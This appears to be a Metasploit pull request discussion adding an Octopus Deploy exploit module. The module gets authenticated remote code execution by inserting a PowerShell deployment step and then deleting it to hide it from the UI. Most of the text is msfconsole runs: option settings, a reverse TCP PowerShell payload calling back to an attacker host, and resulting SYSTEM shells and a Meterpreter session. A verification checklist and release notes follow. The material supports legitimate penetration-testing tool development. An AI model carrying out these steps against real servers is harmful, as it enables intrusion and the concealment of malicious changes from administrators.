Add module to execute powershell on Octopus Deploy server

[james-otten]

Octopus Deploy server allows users with the correct permissions to execute powershell code on the server during a deployment.

During an automated deployment initiated by this module, a powershell based payload is executed in the context of the Octopus Deploy server, which is running as either Local System or a custom domain account. This is done by creating a release that contains a single script step that is run on the Octopus Deploy server. The said script step is deleted after the deployment is started. Though the script step will not be visible in the Octopus Deploy UI, it will remain in the server's database (with lot's of other interesting data).

Options for authenticating with the Octopus Deploy server include username and password combination or an api key. Accounts are handled by Octopus Deploy (stored in database) or Active Directory.

More information about Octopus Deploy:
https://octopus.com

Server Setup

Set up Octopus Deploy server - No need to add accounts (end of step 2), or set up application packaging (step 3)
Create a test user/team - Create a team with "Project contributor" and "Project deployer", or just "System administrator" and add your test user.
Create an API key for your user for testing purposes

Example Runs

Username/Password

msf > use exploit/windows/http/octopusdeploy_deploy
msf exploit(octopusdeploy_deploy) > set PATH /octoADTest
PATH => /octoADTest
msf exploit(octopusdeploy_deploy) > set USERNAME ODUser
USERNAME => ODUser
msf exploit(octopusdeploy_deploy) > set PASSWORD Password1
PASSWORD => Password1
msf exploit(octopusdeploy_deploy) > set RHOST 10.0.0.12
RHOST => 10.0.0.12
msf exploit(octopusdeploy_deploy) > set RPORT 80
RPORT => 80
msf exploit(octopusdeploy_deploy) > set payload windows/powershell_reverse_tcp
payload => windows/powershell_reverse_tcp
msf exploit(octopusdeploy_deploy) > set LHOST 10.0.0.7
LHOST => 10.0.0.7
msf exploit(octopusdeploy_deploy) > run

[*] Started reverse SSL handler on 10.0.0.7:4444 
[*] Getting available projects
[*] Using project TestProject2
[*] Getting steps to TestProject2
[*] Adding step r4XAJc to TestProject2
[*] Getting available channels
[*] Using channel Default
[*] Getting next version
[*] Using version 0.0.2
[*] Creating release
[*] Release Releases-79 created
[*] Deploying TestProject2 version 0.0.2 to TestEnv
[*] Getting updated steps to TestProject2
[*] Deleting step r4XAJc from TestProject2
[*] Step r4XAJc deleted
[*] Powershell session session 1 opened (10.0.0.7:4444 -> 10.0.0.12:59346) at 2017-05-15 19:54:01 -0500

Windows PowerShell running as user WIN-OL1HR5KBTPD$ on WIN-OL1HR5KBTPD
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Octopus\ADTest\Work\20170516025358-22>whoami
nt authority\system
PS C:\Octopus\ADTest\Work\20170516025358-22> exit

[*] 10.0.0.12 - Powershell session session 1 closed.  Reason: Died from Errno::ECONNRESET

msf exploit(octopusdeploy_deploy) > 

API Key

msf > use exploit/windows/http/octopusdeploy_deploy
msf exploit(octopusdeploy_deploy) > set PATH /octoADTest
PATH => /octoADTest
msf exploit(octopusdeploy_deploy) > set RHOST 10.0.0.12
RHOST => 10.0.0.12
msf exploit(octopusdeploy_deploy) > set RPORT 80
RPORT => 80
msf exploit(octopusdeploy_deploy) > set payload windows/powershell_reverse_tcp
payload => windows/powershell_reverse_tcp
msf exploit(octopusdeploy_deploy) > set LHOST 10.0.0.7
LHOST => 10.0.0.7
msf exploit(octopusdeploy_deploy) > set APIKEY API-FCIQ773M43RKNC4I9KZHQTABC
APIKEY => API-FCIQ773M43RKNC4I9KZHQTABC
msf exploit(octopusdeploy_deploy) > set STEPNAME shell
STEPNAME => shell
msf exploit(octopusdeploy_deploy) > run

[*] Started reverse SSL handler on 10.0.0.7:4444 
[*] Getting available projects
[*] Using project TestProject2
[*] Getting steps to TestProject2
[*] Adding step shell to TestProject2
[*] Getting available channels
[*] Using channel Default
[*] Getting next version
[*] Using version 0.0.3
[*] Creating release
[*] Release Releases-80 created
[*] Deploying TestProject2 version 0.0.3 to TestEnv
[*] Getting updated steps to TestProject2
[*] Deleting step shell from TestProject2
[*] Step shell deleted
[*] Powershell session session 1 opened (10.0.0.7:4444 -> 10.0.0.12:59373) at 2017-05-15 19:59:55 -0500

Windows PowerShell running as user WIN-OL1HR5KBTPD$ on WIN-OL1HR5KBTPD
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Octopus\ADTest\Work\20170516025952-24>whoami
nt authority\system
PS C:\Octopus\ADTest\Work\20170516025952-24> exit

[*] 10.0.0.12 - Powershell session session 1 closed.  Reason: Died from Errno::ECONNRESET

msf exploit(octopusdeploy_deploy) > 

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• use exploit/windows/http/octopusdeploy_deploy
• set PATH, RHOST, RPORT, and SSL if needed
• set STEPNAME if desired
• set USERNAME and PASSWORD or just APIKEY
• set payload windows/powershell_reverse_tcp
• set LHOST
• run
• Verify you get a shell with both types of authentication (USERNAME/PASSWORD and APIKEY)
• Verify the supplied STEPNAME or a random identifier is used for the name of the deployment step added by the module
• Verify you do not see the step that was created in the Octopus Deploy UI

[wchen-r7]

I'll give this a try. Thanks!

[wchen-r7]

Works for me:

msf exploit(octopusdeploy_deploy) > exploit

[*] Started reverse TCP handler on 192.168.146.1:4444 
[*] Powershell command length: 2273
[*] Getting available projects
[*] Using project test
[*] Getting steps to test
[*] Adding step EQnSB6xEpEtm48YgSv8 to test
[*] Getting available channels
[*] Using channel Default
[*] Getting next version
[*] Using version 0.0.3
[*] Creating release
[*] Release Releases-3 created
[*] Deploying test version 0.0.3 to test
[*] Getting updated steps to test
[*] Deleting step EQnSB6xEpEtm48YgSv8 from test
[*] Step EQnSB6xEpEtm48YgSv8 deleted
[*] Sending stage (957487 bytes) to 192.168.146.156
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.156:49180) at 2017-05-25 17:30:21 -0500

meterpreter >

[wchen-r7]

I need to add module doc, I also found a typo after I merged. I will do that in a separate PR.

[wchen-r7]

Release Notes

The exploits/windows/http/octopusdeploy_deploy module has been added to the framework. This module exploits a deployment vulnerability in Octopus Deploy. Authentication is required in order to execute a user-supplied Powershell script, which then results in arbitrary remote code execution.